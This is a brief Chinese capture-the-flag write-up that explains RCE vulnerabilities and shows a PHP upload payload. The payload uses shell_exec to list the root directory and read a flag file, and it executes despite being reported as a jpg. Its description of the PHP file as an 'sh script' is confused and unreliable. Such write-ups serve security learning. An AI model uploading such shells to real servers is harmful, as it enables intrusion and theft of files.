本题利用的是:

RCE漏洞

远程代码执行漏洞(RCE)是一种软件安全漏洞,允许攻击者在受害计算机上执行任意代码。攻击者可以利用此漏洞控制受害计算机,窃取数据,或植入恶意软件。

RCE漏洞可能存在于各种软件中,包括Web应用程序、操作系统和应用程序服务器。攻击者可以利用各种方法来利用RCE漏洞,包括:

  • 发送恶意链接或文件给受害者
  • 利用未经身份验证的访问
  • 利用软件中的错误或漏洞

写一个sh脚本:

(sh脚本:Linux系统的运行脚本)

内容:(这个sh脚本虽然是php的语法,但是仍然可以运行)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php

// 返回根目录
chdir('/');

// 执行ls命令
$output = shell_exec('ls');

// 打印命令的输出
echo $output;

// 读取flag文件
$flag = file_get_contents('flag');

// 打印flag文件的内容
echo $flag;

?>

将这个脚本上传

虽然显示上传了了jpg文件,但是你的sh脚本里面的内容仍然是执行了的,访问该文件的地址即可得到flag: